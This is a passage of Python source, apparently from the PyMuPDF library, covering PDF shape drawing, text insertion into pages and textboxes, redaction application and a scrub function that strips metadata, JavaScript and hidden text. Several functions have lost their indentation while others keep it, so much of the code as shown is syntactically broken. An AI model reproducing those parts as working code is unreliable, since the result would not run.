            self.draw_cont += l3 % JM_TUPLE(point * self.ipctm)
            self.draw_cont += l5 % JM_TUPLE(center * self.ipctm)
            self.draw_cont += l5 % JM_TUPLE(Q * self.ipctm)
        self.lastPoint = Q
        return self.lastPoint
def draw_rect(self, rect: rect_like, *, radius=None) -> Point:
"""Draw a rectangle.
Args:
radius: if not None, the rectangle will have rounded corners.
This is the radius of the curvature, given as percentage of
the rectangle width or height. Valid are values 0 < v <= 0.5.
For a sequence of two values, the corners will have different
radii. Otherwise, the percentage will be computed from the
shorter side. A value of (0.5, 0.5) will draw an ellipse.
"""
r = Rect(rect)
if radius == None: # standard rectangle
self.draw_cont += "%g %g %g %g re\n" % JM_TUPLE(
list(r.bl * self.ipctm) + [r.width, r.height]
)
self.updateRect(r)
self.lastPoint = r.tl
return self.lastPoint
# rounded corners requested. This requires 1 or 2 values, each
# with 0 < value <= 0.5
if hasattr(radius, "__float__"):
if radius <= 0 or radius > 0.5:
raise ValueError(f"bad radius value {radius}.")
d = min(r.width, r.height) * radius
px = (d, 0)
py = (0, d)
elif hasattr(radius, "__len__") and len(radius) == 2:
rx, ry = radius
px = (rx * r.width, 0)
py = (0, ry * r.height)
if min(rx, ry) <= 0 or max(rx, ry) > 0.5:
raise ValueError(f"bad radius value {radius}.")
else:
raise ValueError(f"bad radius value {radius}.")
lp = self.draw_line(r.tl + py, r.bl - py)
lp = self.draw_curve(lp, r.bl, r.bl + px)
lp = self.draw_line(lp, r.br - px)
lp = self.draw_curve(lp, r.br, r.br - py)
lp = self.draw_line(lp, r.tr + py)
lp = self.draw_curve(lp, r.tr, r.tr - px)
lp = self.draw_line(lp, r.tl + px)
self.lastPoint = self.draw_curve(lp, r.tl, r.tl + py)
self.updateRect(r)
return self.lastPoint
def draw_quad(self, quad: quad_like) -> Point:
"""Draw a Quad."""
q = Quad(quad)
return self.draw_polyline([q.ul, q.ll, q.lr, q.ur, q.ul])
def draw_zigzag(
self,
p1: point_like,
p2: point_like,
breadth: float = 2,
) -> Point:
"""Draw a zig-zagged line from p1 to p2."""
p1 = Point(p1)
p2 = Point(p2)
S = p2 - p1 # vector start - end
rad = abs(S) # distance of points
cnt = 4 * int(round(rad / (4 * breadth), 0)) # always take full phases
if cnt < 4:
raise ValueError("points too close")
mb = rad / cnt # revised breadth
matrix = Matrix(util_hor_matrix(p1, p2)) # normalize line to x-axis
i_mat = ~matrix # get original position
points = [] # stores edges
for i in range(1, cnt):
if i % 4 == 1: # point "above" connection
p = Point(i, -1) * mb
elif i % 4 == 3: # point "below" connection
p = Point(i, 1) * mb
else: # ignore others
continue
points.append(p * i_mat)
self.draw_polyline([p1] + points + [p2]) # add start and end points
return p2
def draw_squiggle(
self,
p1: point_like,
p2: point_like,
breadth=2,
) -> Point:
"""Draw a squiggly line from p1 to p2."""
p1 = Point(p1)
p2 = Point(p2)
S = p2 - p1 # vector start - end
rad = abs(S) # distance of points
cnt = 4 * int(round(rad / (4 * breadth), 0)) # always take full phases
if cnt < 4:
raise ValueError("points too close")
mb = rad / cnt # revised breadth
matrix = Matrix(util_hor_matrix(p1, p2)) # normalize line to x-axis
i_mat = ~matrix # get original position
k = 2.4142135623765633 # y of draw_curve helper point
points = [] # stores edges
for i in range(1, cnt):
if i % 4 == 1: # point "above" connection
p = Point(i, -k) * mb
elif i % 4 == 3: # point "below" connection
p = Point(i, k) * mb
else: # else on connection line
p = Point(i, 0) * mb
points.append(p * i_mat)
points = [p1] + points + [p2]
cnt = len(points)
i = 0
while i + 2 < cnt:
self.draw_curve(points[i], points[i + 1], points[i + 2])
i += 2
return p2
# ==============================================================================
# Shape.insert_text
# ==============================================================================
    def insert_text(
        self,
        point: point_like,
        buffer: typing.Union[str, list],
        fontsize: float = 11,
        lineheight: OptFloat = None,
        fontname: str = "helv",
        fontfile: OptStr = None,
        set_simple: bool = 0,
        encoding: int = 0,
        color: OptSeq = None,
        fill: OptSeq = None,
        render_mode: int = 0,
        border_width: float = 0.05,
        rotate: int = 0,
        morph: OptSeq = None,
        stroke_opacity: float = 1,
        fill_opacity: float = 1,
        oc: int = 0,
    ) -> int:
        """Insert text lines starting at 'point'.

        Builds the PDF text operator source and appends it to
        self.text_cont. Lines that no longer fit on the page (in the
        chosen rotation direction) are dropped.

        Returns:
            Number of lines actually inserted (0 if nothing was done).
        """
        # ensure 'text' is a list of strings, worth dealing with
        if not bool(buffer):
            return 0
        if type(buffer) not in (list, tuple):
            text = buffer.splitlines()
        else:
            text = buffer
        if not len(text) > 0:
            return 0
        point = Point(point)
        try:
            # largest character code decides whether extended glyph tables are needed
            maxcode = max([ord(c) for c in " ".join(text)])
        except:
            return 0
        # ensure valid 'fontname'
        fname = fontname
        if fname.startswith("/"):
            fname = fname[1:]
        xref = self.page.insert_font(
            fontname=fname, fontfile=fontfile, encoding=encoding, set_simple=set_simple
        )
        # retrieve cached font properties (created by insert_font above)
        fontinfo = CheckFontInfo(self.doc, xref)
        fontdict = fontinfo[1]
        ordering = fontdict["ordering"]
        simple = fontdict["simple"]
        bfname = fontdict["name"]
        ascender = fontdict["ascender"]
        descender = fontdict["descender"]
        # compute the line height: explicit factor, or derived from font metrics
        if lineheight:
            lheight = fontsize * lineheight
        elif ascender - descender <= 1:
            lheight = fontsize * 1.2
        else:
            lheight = fontsize * (ascender - descender)
        if maxcode > 255:
            # extend the glyph table to cover all used character codes
            glyphs = self.doc.get_char_widths(xref, maxcode + 1)
        else:
            glyphs = fontdict["glyphs"]
        # convert each line to a PDF 'TJ' operand string
        tab = []
        for t in text:
            if simple and bfname not in ("Symbol", "ZapfDingbats"):
                g = None
            else:
                g = glyphs
            tab.append(getTJstr(t, g, simple, ordering))
        text = tab
        color_str = ColorCode(color, "c")
        fill_str = ColorCode(fill, "f")
        if not fill and render_mode == 0:  # ensure fill color when 0 Tr
            fill = color
            fill_str = ColorCode(color, "f")
        morphing = CheckMorph(morph)
        rot = rotate
        if rot % 90 != 0:
            raise ValueError("bad rotate value")
        while rot < 0:
            rot += 360
        rot = rot % 360  # text rotate = 0, 90, 270, 180
        # operator templates: graphics state + text begin, and line advance
        templ1 = "\nq\n%s%sBT\n%s1 0 0 1 %g %g Tm\n/%s %g Tf "
        templ2 = "TJ\n0 -%g TD\n"
        cmp90 = "0 1 -1 0 0 0 cm\n"  # rotates 90 deg counter-clockwise
        cmm90 = "0 -1 1 0 0 0 cm\n"  # rotates 90 deg clockwise
        cm180 = "-1 0 0 -1 0 0 cm\n"  # rotates by 180 deg.
        height = self.height
        width = self.width
        # setting up for standard rotation directions
        # case rotate = 0
        if morphing:
            # build the morph matrix around the fixpoint (in PDF coordinates)
            m1 = Matrix(1, 0, 0, 1, morph[0].x + self.x, height - morph[0].y - self.y)
            mat = ~m1 * morph[1] * m1
            cm = "%g %g %g %g %g %g cm\n" % JM_TUPLE(mat)
        else:
            cm = ""
        top = height - point.y - self.y  # start of 1st char
        left = point.x + self.x  # start of 1. char
        space = top  # space available
        headroom = point.y + self.y  # distance to page border
        if rot == 90:
            left = height - point.y - self.y
            top = -point.x - self.x
            cm += cmp90
            space = width - abs(top)
            headroom = point.x + self.x
        elif rot == 270:
            left = -height + point.y + self.y
            top = point.x + self.x
            cm += cmm90
            space = abs(top)
            headroom = width - point.x - self.x
        elif rot == 180:
            left = -point.x - self.x
            top = -height + point.y + self.y
            cm += cm180
            space = abs(point.y + self.y)
            headroom = height - point.y - self.y
        # wrap output in optional content (layer) markers if requested
        optcont = self.page._get_optional_content(oc)
        if optcont != None:
            bdc = "/OC /%s BDC\n" % optcont
            emc = "EMC\n"
        else:
            bdc = emc = ""
        # set up transparency via an ExtGState if opacities differ from 1
        alpha = self.page._set_opacity(CA=stroke_opacity, ca=fill_opacity)
        if alpha == None:
            alpha = ""
        else:
            alpha = "/%s gs\n" % alpha
        nres = templ1 % (bdc, alpha, cm, left, top, fname, fontsize)
        if render_mode > 0:
            nres += "%i Tr " % render_mode
            nres += "%g w " % (border_width * fontsize)
        if color is not None:
            nres += color_str
        if fill is not None:
            nres += fill_str
        # =========================================================================
        # start text insertion
        # =========================================================================
        nres += text[0]
        nlines = 1  # set output line counter
        if len(text) > 1:
            nres += templ2 % lheight  # line 1
        else:
            nres += templ2[:2]
        for i in range(1, len(text)):
            if space < lheight:
                break  # no space left on page
            if i > 1:
                nres += "\nT* "
            nres += text[i] + templ2[:2]
            space -= lheight
            nlines += 1
        nres += "\nET\n%sQ\n" % emc
        # =====================================================================
        # end of text insertion
        # =====================================================================
        # update the /Contents object
        self.text_cont += nres
        return nlines
# =========================================================================
# Shape.insert_textbox
# =========================================================================
def insert_textbox(
self,
rect: rect_like,
buffer: typing.Union[str, list],
fontname: OptStr = "helv",
fontfile: OptStr = None,
fontsize: float = 11,
lineheight: OptFloat = None,
set_simple: bool = 0,
encoding: int = 0,
color: OptSeq = None,
fill: OptSeq = None,
expandtabs: int = 1,
border_width: float = 0.05,
align: int = 0,
render_mode: int = 0,
rotate: int = 0,
morph: OptSeq = None,
stroke_opacity: float = 1,
fill_opacity: float = 1,
oc: int = 0,
) -> float:
"""Insert text into a given rectangle.
Args:
rect -- the textbox to fill
buffer -- text to be inserted
fontname -- a Base-14 font, font name or '/name'
fontfile -- name of a font file
fontsize -- font size
lineheight -- overwrite the font property
color -- RGB stroke color triple
fill -- RGB fill color triple
render_mode -- text rendering control
border_width -- thickness of glyph borders as percentage of fontsize
expandtabs -- handles tabulators with string function
align -- left, center, right, justified
rotate -- 0, 90, 180, or 270 degrees
morph -- morph box with a matrix and a fixpoint
Returns:
unused or deficit rectangle area (float)
"""
rect = Rect(rect)
if rect.is_empty or rect.is_infinite:
raise ValueError("text box must be finite and not empty")
color_str = ColorCode(color, "c")
fill_str = ColorCode(fill, "f")
if fill is None and render_mode == 0: # ensure fill color for 0 Tr
fill = color
fill_str = ColorCode(color, "f")
optcont = self.page._get_optional_content(oc)
if optcont != None:
bdc = "/OC /%s BDC\n" % optcont
emc = "EMC\n"
else:
bdc = emc = ""
# determine opacity / transparency
alpha = self.page._set_opacity(CA=stroke_opacity, ca=fill_opacity)
if alpha == None:
alpha = ""
else:
alpha = "/%s gs\n" % alpha
if rotate % 90 != 0:
raise ValueError("rotate must be multiple of 90")
rot = rotate
while rot < 0:
rot += 360
rot = rot % 360
# is buffer worth of dealing with?
if not bool(buffer):
return rect.height if rot in (0, 180) else rect.width
cmp90 = "0 1 -1 0 0 0 cm\n" # rotates counter-clockwise
cmm90 = "0 -1 1 0 0 0 cm\n" # rotates clockwise
cm180 = "-1 0 0 -1 0 0 cm\n" # rotates by 180 deg.
height = self.height
fname = fontname
if fname.startswith("/"):
fname = fname[1:]
xref = self.page.insert_font(
fontname=fname, fontfile=fontfile, encoding=encoding, set_simple=set_simple
)
fontinfo = CheckFontInfo(self.doc, xref)
fontdict = fontinfo[1]
ordering = fontdict["ordering"]
simple = fontdict["simple"]
glyphs = fontdict["glyphs"]
bfname = fontdict["name"]
ascender = fontdict["ascender"]
descender = fontdict["descender"]
if lineheight:
lheight_factor = lineheight
elif ascender - descender <= 1:
lheight_factor = 1.2
else:
lheight_factor = ascender - descender
lheight = fontsize * lheight_factor
# create a list from buffer, split into its lines
if type(buffer) in (list, tuple):
t0 = "\n".join(buffer)
else:
t0 = buffer
maxcode = max([ord(c) for c in t0])
# replace invalid char codes for simple fonts
if simple and maxcode > 255:
t0 = "".join([c if ord(c) < 256 else "?" for c in t0])
t0 = t0.splitlines()
glyphs = self.doc.get_char_widths(xref, maxcode + 1)
if simple and bfname not in ("Symbol", "ZapfDingbats"):
tj_glyphs = None
else:
tj_glyphs = glyphs
# ----------------------------------------------------------------------
# calculate pixel length of a string
# ----------------------------------------------------------------------
def pixlen(x):
"""Calculate pixel length of x."""
if ordering < 0:
return sum([glyphs[ord(c)][1] for c in x]) * fontsize
else:
return len(x) * fontsize
# ---------------------------------------------------------------------
if ordering < 0:
blen = glyphs[32][1] * fontsize # pixel size of space character
else:
blen = fontsize
text = "" # output buffer
if CheckMorph(morph):
m1 = Matrix(
1, 0, 0, 1, morph[0].x + self.x, self.height - morph[0].y - self.y
)
mat = ~m1 * morph[1] * m1
cm = "%g %g %g %g %g %g cm\n" % JM_TUPLE(mat)
else:
cm = ""
# ---------------------------------------------------------------------
# adjust for text orientation / rotation
# ---------------------------------------------------------------------
progr = 1 # direction of line progress
c_pnt = Point(0, fontsize * ascender) # used for line progress
if rot == 0: # normal orientation
point = rect.tl + c_pnt # line 1 is 'lheight' below top
maxwidth = rect.width # pixels available in one line
maxheight = rect.height # available text height
elif rot == 90: # rotate counter clockwise
c_pnt = Point(fontsize * ascender, 0) # progress in x-direction
point = rect.bl + c_pnt # line 1 'lheight' away from left
maxwidth = rect.height # pixels available in one line
maxheight = rect.width # available text height
cm += cmp90
elif rot == 180: # text upside down
# progress upwards in y direction
c_pnt = -Point(0, fontsize * ascender)
point = rect.br + c_pnt # line 1 'lheight' above bottom
maxwidth = rect.width # pixels available in one line
progr = -1 # subtract lheight for next line
maxheight = rect.height # available text height
cm += cm180
else: # rotate clockwise (270 or -90)
# progress from right to left
c_pnt = -Point(fontsize * ascender, 0)
point = rect.tr + c_pnt # line 1 'lheight' left of right
maxwidth = rect.height # pixels available in one line
progr = -1 # subtract lheight for next line
maxheight = rect.width # available text height
cm += cmm90
# =====================================================================
# line loop
# =====================================================================
just_tab = [] # 'justify' indicators per line
for i, line in enumerate(t0):
line_t = line.expandtabs(expandtabs).split(" ") # split into words
num_words = len(line_t)
lbuff = "" # init line buffer
rest = maxwidth # available line pixels
# =================================================================
# word loop
# =================================================================
for j in range(num_words):
word = line_t[j]
pl_w = pixlen(word) # pixel len of word
if rest >= pl_w: # does it fit on the line?
lbuff += word + " " # yes, append word
rest -= pl_w + blen # update available line space
continue # next word
# word doesn't fit - output line (if not empty)
if lbuff:
lbuff = lbuff.rstrip() + "\n" # line full, append line break
text += lbuff # append to total text
just_tab.append(True) # can align-justify
lbuff = "" # re-init line buffer
rest = maxwidth # re-init avail. space
if pl_w <= maxwidth: # word shorter than 1 line?
lbuff = word + " " # start the line with it
rest = maxwidth - pl_w - blen # update free space
continue
# long word: split across multiple lines - char by char ...
if len(just_tab) > 0:
just_tab[-1] = False # cannot align-justify
for c in word:
if pixlen(lbuff) <= maxwidth - pixlen(c):
lbuff += c
else: # line full
lbuff += "\n" # close line
text += lbuff # append to text
just_tab.append(False) # cannot align-justify
lbuff = c # start new line with this char
lbuff += " " # finish long word
rest = maxwidth - pixlen(lbuff) # long word stored
if lbuff: # unprocessed line content?
text += lbuff.rstrip() # append to text
just_tab.append(False) # cannot align-justify
if i < len(t0) - 1: # not the last line?
text += "\n" # insert line break
# compute used part of the textbox
if text.endswith("\n"):
text = text[:-1]
lb_count = text.count("\n") + 1 # number of lines written
# text height = line count * line height plus one descender value
text_height = lheight * lb_count - descender * fontsize
more = text_height - maxheight # difference to height limit
if more > EPSILON: # landed too much outside rect
return (-1) * more # return deficit, don't output
more = abs(more)
if more < EPSILON:
more = 0 # don't bother with epsilons
nres = "\nq\n%s%sBT\n" % (bdc, alpha) + cm # initialize output buffer
templ = "1 0 0 1 %g %g Tm /%s %g Tf "
# center, right, justify: output each line with its own specifics
text_t = text.splitlines() # split text in lines again
just_tab[-1] = False # never justify last line
for i, t in enumerate(text_t):
pl = maxwidth - pixlen(t) # length of empty line part
pnt = point + c_pnt * (i * lheight_factor) # text start of line
if align == 1: # center: right shift by half width
if rot in (0, 180):
pnt = pnt + Point(pl / 2, 0) * progr
else:
pnt = pnt - Point(0, pl / 2) * progr
elif align == 2: # right: right shift by full width
if rot in (0, 180):
pnt = pnt + Point(pl, 0) * progr
else:
pnt = pnt - Point(0, pl) * progr
elif align == 3: # justify
spaces = t.count(" ") # number of spaces in line
if spaces > 0 and just_tab[i]: # if any, and we may justify
spacing = pl / spaces # make every space this much larger
else:
spacing = 0 # keep normal space length
top = height - pnt.y - self.y
left = pnt.x + self.x
if rot == 90:
left = height - pnt.y - self.y
top = -pnt.x - self.x
elif rot == 270:
left = -height + pnt.y + self.y
top = pnt.x + self.x
elif rot == 180:
left = -pnt.x - self.x
top = -height + pnt.y + self.y
nres += templ % (left, top, fname, fontsize)
if render_mode > 0:
nres += "%i Tr " % render_mode
nres += "%g w " % (border_width * fontsize)
if align == 3:
nres += "%g Tw " % spacing
if color is not None:
nres += color_str
if fill is not None:
nres += fill_str
nres += "%sTJ\n" % getTJstr(t, tj_glyphs, simple, ordering)
nres += "ET\n%sQ\n" % emc
self.text_cont += nres
self.updateRect(rect)
return more
def finish(
self,
width: float = 1,
color: OptSeq = (0,),
fill: OptSeq = None,
lineCap: int = 0,
lineJoin: int = 0,
dashes: OptStr = None,
even_odd: bool = False,
morph: OptSeq = None,
closePath: bool = True,
fill_opacity: float = 1,
stroke_opacity: float = 1,
oc: int = 0,
) -> None:
"""Finish the current drawing segment.
Notes:
Apply colors, opacity, dashes, line style and width, or
morphing. Also whether to close the path
by connecting last to first point.
"""
if self.draw_cont == "": # treat empty contents as no-op
return
if width == 0: # border color makes no sense then
color = None
elif color == None: # vice versa
width = 0
# if color == None and fill == None:
# raise ValueError("at least one of 'color' or 'fill' must be given")
color_str = ColorCode(color, "c") # ensure proper color string
fill_str = ColorCode(fill, "f") # ensure proper fill string
optcont = self.page._get_optional_content(oc)
if optcont is not None:
self.draw_cont = "/OC /%s BDC\n" % optcont + self.draw_cont
emc = "EMC\n"
else:
emc = ""
alpha = self.page._set_opacity(CA=stroke_opacity, ca=fill_opacity)
if alpha != None:
self.draw_cont = "/%s gs\n" % alpha + self.draw_cont
if width != 1 and width != 0:
self.draw_cont += "%g w\n" % width
if lineCap != 0:
self.draw_cont = "%i J\n" % lineCap + self.draw_cont
if lineJoin != 0:
self.draw_cont = "%i j\n" % lineJoin + self.draw_cont
if dashes not in (None, "", "[] 0"):
self.draw_cont = "%s d\n" % dashes + self.draw_cont
if closePath:
self.draw_cont += "h\n"
self.lastPoint = None
if color is not None:
self.draw_cont += color_str
if fill is not None:
self.draw_cont += fill_str
if color is not None:
if not even_odd:
self.draw_cont += "B\n"
else:
self.draw_cont += "B*\n"
else:
if not even_odd:
self.draw_cont += "f\n"
else:
self.draw_cont += "f*\n"
else:
self.draw_cont += "S\n"
self.draw_cont += emc
if CheckMorph(morph):
m1 = Matrix(
1, 0, 0, 1, morph[0].x + self.x, self.height - morph[0].y - self.y
)
mat = ~m1 * morph[1] * m1
self.draw_cont = "%g %g %g %g %g %g cm\n" % JM_TUPLE(mat) + self.draw_cont
self.totalcont += "\nq\n" + self.draw_cont + "Q\n"
self.draw_cont = ""
self.lastPoint = None
return
def commit(self, overlay: bool = True) -> None:
"""Update the page's /Contents object with Shape data. The argument controls whether data appear in foreground (default) or background."""
CheckParent(self.page) # doc may have died meanwhile
self.totalcont += self.text_cont
self.totalcont = self.totalcont.encode()
if self.totalcont != b"":
# make /Contents object with dummy stream
xref = TOOLS._insert_contents(self.page, b" ", overlay)
# update it with potential compression
self.doc.update_stream(xref, self.totalcont)
self.lastPoint = None # clean up ...
self.rect = None #
self.draw_cont = "" # for potential ...
self.text_cont = "" # ...
self.totalcont = "" # re-use
return
def apply_redactions(page: Page, images: int = 2) -> bool:
    """Apply the redaction annotations of the page.

    Args:
        page: the PDF page.
        images: 0 - ignore images, 1 - remove complete overlapping image,
            2 - blank out overlapping image parts.
    Returns:
        True if redactions were applied, False if the page had none.
    """

    def center_rect(annot_rect, text, font, fsize):
        """Shrink the rectangle to approximately vertically center the text.

        'insert_textbox' supports no vertical centering, so estimate the
        number of required text lines and return a sub-rectangle of reduced
        height, which should still be sufficient.

        Args:
            annot_rect: the annotation rectangle.
            text: the overlay text.
            font: the fontname. Must be one of the CJK or Base-14 set, else
                the rectangle is returned unchanged.
            fsize: the fontsize.
        Returns:
            A rectangle to use instead of the annot rectangle.
        """
        if not text:
            return annot_rect
        try:
            text_width = get_text_length(text, font, fsize)
        except ValueError:  # unsupported font
            return annot_rect
        line_height = fsize * 1.2
        est_height = math.ceil(text_width / annot_rect.width) * line_height
        if est_height >= annot_rect.height:
            return annot_rect
        sub = annot_rect
        sub.y0 = (annot_rect.tl.y + annot_rect.bl.y - est_height) * 0.5
        return sub

    CheckParent(page)
    doc = page.parent
    if doc.is_encrypted or doc.is_closed:
        raise ValueError("document closed or encrypted")
    if not doc.is_pdf:
        raise ValueError("is no PDF")
    # save the parameter values of all redaction annots first
    redact_annots = [
        annot._get_redact_values() for annot in page.annots(types=(PDF_ANNOT_REDACT,))
    ]
    if not redact_annots:  # any redactions on this page?
        return False  # no redactions
    if not page._apply_redactions(images):  # MuPDF redaction process step
        raise ValueError("Error applying redactions.")  # should not happen really
    # now write replacement text into the old redact rectangles
    shape = page.new_shape()
    for redact in redact_annots:
        annot_rect = redact["rect"]
        fill = redact["fill"]
        if fill:
            shape.draw_rect(annot_rect)  # colorize the rect background
            shape.finish(fill=fill, color=fill)
        if "text" in redact.keys():  # if we also have overlay text
            text = redact["text"]
            fname = redact["fontname"]
            fsize = redact["fontsize"]
            # try finding a vertically centered sub-rect
            trect = center_rect(annot_rect, text, fname, fsize)
            rc = -1
            while rc < 0 and fsize >= 4:  # while not enough room
                rc = shape.insert_textbox(  # (re-) try insertion
                    trect,
                    text,
                    fontname=fname,
                    fontsize=fsize,
                    color=redact["text_color"],
                    align=redact.get("align", 0),
                )
                fsize -= 0.5  # reduce font if unsuccessful
    shape.commit()  # append new contents object
    return True
# ------------------------------------------------------------------------------
# Remove potentially sensitive data from a PDF. Similar to the Adobe
# Acrobat 'sanitize' function
# ------------------------------------------------------------------------------
def scrub(
    doc: Document,
    attached_files: bool = True,
    clean_pages: bool = True,
    embedded_files: bool = True,
    hidden_text: bool = True,
    javascript: bool = True,
    metadata: bool = True,
    redactions: bool = True,
    redact_images: int = 0,
    remove_links: bool = True,
    reset_fields: bool = True,
    reset_responses: bool = True,
    thumbnails: bool = True,
    xml_metadata: bool = True,
) -> None:
    """Remove potentially sensitive data from a PDF.

    Similar to the Adobe Acrobat 'sanitize' function. Each boolean argument
    switches one scrubbing feature on (default) or off.

    Args:
        doc: the PDF document.
        attached_files: blank out content of file attachment annotations.
        clean_pages: clean page /Contents. Required for 'hidden_text' and
            'redactions', which are switched off if this is False.
        hidden_text: remove text with render mode 3 (invisible).
        embedded_files / javascript / metadata / xml_metadata / thumbnails:
            remove the respective document data.
        redactions: apply redaction annotations; 'redact_images' controls the
            image handling (see Page.apply_redactions).
        remove_links / reset_fields / reset_responses: per-page cleanups.
    """

    def remove_hidden(cont_lines):
        """Remove hidden text from a PDF page.

        Args:
            cont_lines: list of lines with /Contents content. Must have the
                status from after page.clean_contents(), which guarantees a
                standard formatting: one command per line, single spaces
                between operators. This allows for the drastic
                simplifications made here.
        Returns:
            List of /Contents lines from which hidden text has been removed,
            or None if nothing was removed.
        """
        out_lines = []  # will return this
        in_text = False  # indicate if within BT/ET object
        suppress = False  # indicate text suppression active
        make_return = False
        for line in cont_lines:
            if line == b"BT":  # start of text object
                in_text = True  # switch on
                out_lines.append(line)  # output it
                continue
            if line == b"ET":  # end of text object
                in_text = False  # switch off
                out_lines.append(line)  # output it
                continue
            if line == b"3 Tr":  # text suppression operator
                suppress = True  # switch on
                make_return = True
                continue
            # Any other render mode switches suppression off again.
            # NOTE: compare with a slice - indexing a bytes object yields an
            # int, so the previous 'line[0] != b"3"' was always True.
            if line[-2:] == b"Tr" and line[:1] != b"3":
                suppress = False  # text rendering changed
                out_lines.append(line)
                continue
            if line == b"Q":  # unstack command also switches off
                suppress = False
                out_lines.append(line)
                continue
            if suppress and in_text:  # suppress hidden lines
                continue
            out_lines.append(line)
        if make_return:
            return out_lines
        else:
            return None

    if not doc.is_pdf:  # only works for PDF
        raise ValueError("is no PDF")
    if doc.is_encrypted or doc.is_closed:
        raise ValueError("closed or encrypted doc")
    if clean_pages is False:
        # these two features require cleaned page contents
        hidden_text = False
        redactions = False
    if metadata:
        doc.set_metadata({})  # remove standard metadata
    for page in doc:
        if reset_fields:
            # reset form fields (widgets)
            for widget in page.widgets():
                widget.reset()
        if remove_links:
            links = page.get_links()  # list of all links on page
            for link in links:  # remove all links
                page.delete_link(link)
        found_redacts = False
        for annot in page.annots():
            if annot.type[0] == PDF_ANNOT_FILE_ATTACHMENT and attached_files:
                annot.update_file(buffer=b" ")  # set file content to empty
            if reset_responses:
                annot.delete_responses()
            if annot.type[0] == PDF_ANNOT_REDACT:
                found_redacts = True
        if redactions and found_redacts:
            page.apply_redactions(images=redact_images)
        if not (clean_pages or hidden_text):
            continue  # done with the page
        page.clean_contents()
        if not page.get_contents():
            continue  # nothing left on this page
        if hidden_text:
            xref = page.get_contents()[0]  # only one b/o cleaning!
            cont = doc.xref_stream(xref)
            cont_lines = remove_hidden(cont.splitlines())  # remove hidden text
            if cont_lines:  # something was actually removed
                cont = b"\n".join(cont_lines)
                doc.update_stream(xref, cont)  # rewrite the page /Contents
        if thumbnails:  # remove page thumbnails?
            if doc.xref_get_key(page.xref, "Thumb")[0] != "null":
                doc.xref_set_key(page.xref, "Thumb", "null")
    # pages are scrubbed, now perform document-wide scrubbing
    # remove embedded files
    if embedded_files:
        for name in doc.embfile_names():
            doc.embfile_del(name)
    if xml_metadata:
        doc.del_xml_metadata()
    if not (xml_metadata or javascript):
        xref_limit = 0  # skip the xref scan entirely
    else:
        xref_limit = doc.xref_length()
    for xref in range(1, xref_limit):
        if not doc.xref_object(xref):
            msg = "bad xref %i - clean PDF before scrubbing" % xref
            raise ValueError(msg)
        if javascript and doc.xref_get_key(xref, "S")[1] == "/JavaScript":
            # a /JavaScript action object
            obj = "<</S/JavaScript/JS()>>"  # replace with a null JavaScript
            doc.update_object(xref, obj)  # update this object
            continue  # no further handling
        if not xml_metadata:
            continue
        if doc.xref_get_key(xref, "Type")[1] == "/Metadata":
            # delete any metadata object directly
            doc.update_object(xref, "<<>>")
            doc.update_stream(xref, b"deleted", new=True)
            continue
        if doc.xref_get_key(xref, "Metadata")[0] != "null":
            doc.xref_set_key(xref, "Metadata", "null")
def fill_textbox(
    writer: TextWriter,
    rect: rect_like,
    text: typing.Union[str, list],
    pos: point_like = None,
    font: typing.Optional[Font] = None,
    fontsize: float = 11,
    lineheight: OptFloat = None,
    align: int = 0,
    warn: bool = None,
    right_to_left: bool = False,
    small_caps: bool = False,
) -> list:
    """Fill a rectangle with text.

    Splits the text into lines fitting the rectangle width (cutting
    over-long words character-wise if needed) and appends them to the
    TextWriter, honoring the requested alignment.

    Args:
        writer: TextWriter object (= "self")
        rect: rect-like to receive the text.
        text: string or list/tuple of strings.
        pos: point-like start position of first word.
        font: Font object (default Font('helv')).
        fontsize: the fontsize.
        lineheight: overwrite the font property
        align: (int) 0 = left, 1 = center, 2 = right, 3 = justify
        warn: (bool) text overflow action: none (None), warn (True),
            or exception (False).
        right_to_left: (bool) indicate right-to-left language.
    Returns:
        List of (text, length) tuples for the lines that did not fit.
    """
    rect = Rect(rect)
    if rect.is_empty:
        raise ValueError("fill rect must not empty.")
    if type(font) is not Font:
        font = Font("helv")

    def textlen(x):
        """Return length of a string."""
        return font.text_length(
            x, fontsize=fontsize, small_caps=small_caps
        )  # abbreviation

    def char_lengths(x):
        """Return list of single character lengths for a string."""
        return font.char_lengths(x, fontsize=fontsize, small_caps=small_caps)

    def append_this(pos, text):
        # output 'text' at 'pos' with the established font parameters
        return writer.append(
            pos, text, font=font, fontsize=fontsize, small_caps=small_caps
        )

    tolerance = fontsize * 0.2  # extra distance to left border
    space_len = textlen(" ")
    std_width = rect.width - tolerance  # line width available after tolerance
    std_start = rect.x0 + tolerance  # standard horizontal start position

    def norm_words(width, words):
        """Cut any word in pieces no longer than 'width'."""
        nwords = []
        word_lengths = []
        for w in words:
            wl_lst = char_lengths(w)
            wl = sum(wl_lst)
            if wl <= width:  # nothing to do - copy over
                nwords.append(w)
                word_lengths.append(wl)
                continue
            # word longer than rect width - split it in parts
            n = len(wl_lst)
            while n > 0:
                wl = sum(wl_lst[:n])
                if wl <= width:  # first n characters fit: emit them
                    nwords.append(w[:n])
                    word_lengths.append(wl)
                    w = w[n:]  # keep splitting the remainder
                    wl_lst = wl_lst[n:]
                    n = len(wl_lst)
                else:
                    n -= 1
        return nwords, word_lengths

    def output_justify(start, line):
        """Justified output of a line."""
        # ignore leading / trailing / multiple spaces
        words = [w for w in line.split(" ") if w != ""]
        nwords = len(words)
        if nwords == 0:
            return
        if nwords == 1:  # single word cannot be justified
            append_this(start, words[0])
            return
        tl = sum([textlen(w) for w in words])  # total word lengths
        gaps = nwords - 1  # number of word gaps
        gapl = (std_width - tl) / gaps  # width of each gap
        for w in words:
            _, lp = append_this(start, w)  # output one word
            start.x = lp.x + gapl  # next start at word end plus gap
        return

    asc = font.ascender
    dsc = font.descender
    if not lineheight:
        # fallback line height factor when ascender/descender look degenerate
        if asc - dsc <= 1:
            lheight = 1.2
        else:
            lheight = asc - dsc
    else:
        lheight = lineheight
    LINEHEIGHT = fontsize * lheight  # effective line height
    width = std_width  # available horizontal space
    # starting point of text
    if pos is not None:
        pos = Point(pos)
    else:  # default is just below rect top-left
        pos = rect.tl + (tolerance, fontsize * asc)
    if not pos in rect:
        raise ValueError("Text must start in rectangle.")
    # calculate displacement factor for alignment
    if align == TEXT_ALIGN_CENTER:
        factor = 0.5
    elif align == TEXT_ALIGN_RIGHT:
        factor = 1.0
    else:
        factor = 0
    # split in lines if just a string was given
    if type(text) is str:
        textlines = text.splitlines()
    else:
        textlines = []
        for line in text:
            textlines.extend(line.splitlines())
    max_lines = int((rect.y1 - pos.y) / LINEHEIGHT) + 1  # number of fitting lines
    new_lines = []  # the final list of textbox lines
    no_justify = []  # no justify for these line numbers
